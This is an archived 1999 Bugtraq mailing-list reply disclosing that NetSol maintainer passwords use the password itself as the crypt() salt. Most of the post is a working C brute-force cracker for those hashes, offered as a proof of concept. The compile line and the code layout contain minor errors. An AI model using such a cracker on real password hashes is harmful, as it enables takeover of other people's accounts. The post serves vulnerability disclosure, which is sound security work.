[12525] in bugtraq
Re: Insecure handling of NetSol maintainer passwords
daemon@ATHENA.MIT.EDU (pedward@WEBCOM.COM)
Thu Nov 11 12:29:57 1999
Content-Type: text
Message-Id: <199911102249.OAA03232@eris.webcom.com>
Date: Wed, 10 Nov 1999 14:49:58 -0800
Reply-To: pedward@WEBCOM.COM
From: pedward@WEBCOM.COM
X-To: jogata@nodc.noaa.gov
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <38287ADC.23E073B2@nodc.noaa.gov> from "Jefferson Ogata" at Nov
9, 99 02:49:48 pm
I couldn't resist doing a proof-of-concept, however I take no responsibility for cracking your own
password. It takes a while to run on fairly standard passwords. Please don't bombard be with
'haX0r d00d' requests, like the Frontpage thing.
--Perry
Compiles on RH6.0 with:
gcc -O -funroll-loops nic_crack nic_crack.c -lcyprt
---------------------------------------------------8<-------------------------------------------------
/* nic_crack.c - brute forces Netsol encrypted NIC update passwords */
#define _XOPEN_SOURCE
#include <stdio.h>
#include <unistd.h>
struct key {
char a[2];
char b, c, d, e, f, g;
char term;
};
int main(int argc, char *argv[])
{
char *passwd;
char *crypted;
struct key thekey;
char first[3];
int b,c,d,e,f,g,i;
if (argc<2) {
fprintf(stderr,"usage: nic_crack <crypted password>\n");
exit(1);
}
passwd = argv[1];
thekey.term = '\0';
strncpy(first, argv[1], 2);
first[2] = 0;
strncpy(thekey.a, argv[1], 2);
for (g = 0; g < 127; g++) {
thekey.g = g;
for (f = 0; f < 127; f++) {
thekey.f = f;
for (e = 0; e < 127; e++) {
thekey.e = e;
for (d = 0; d < 127; d++) {
thekey.d = d;
for (c = 0; c < 127; c++) {
thekey.c = c;
for (b = 0; b < 127; b++) {
thekey.b = b;
crypted = (char *)crypt((char *)&thekey, first);
if (strcmp(crypted, passwd) == 0) {
printf("Found: %s\n", (char *)&thekey);
return 0;
}
}
}
}
}
}
}
return 0;
---------------------------------------------------8<-------------------------------------------------
}
> through crypt(), but the first two characters of the encrypted value (the salt)
> are the same as the first two characters of the password, indicating they use
> the password as its own salt. This dramatically limits the usefulness of
>
> --
> Jefferson Ogata <jogata@nodc.noaa.gov> National Oceanographic Data Center
> You can't step into the same river twice. -- Herakleitos
>
--
Perry Harrington Director of zelur xuniL ()
................ System Architecture Think Blue. /\
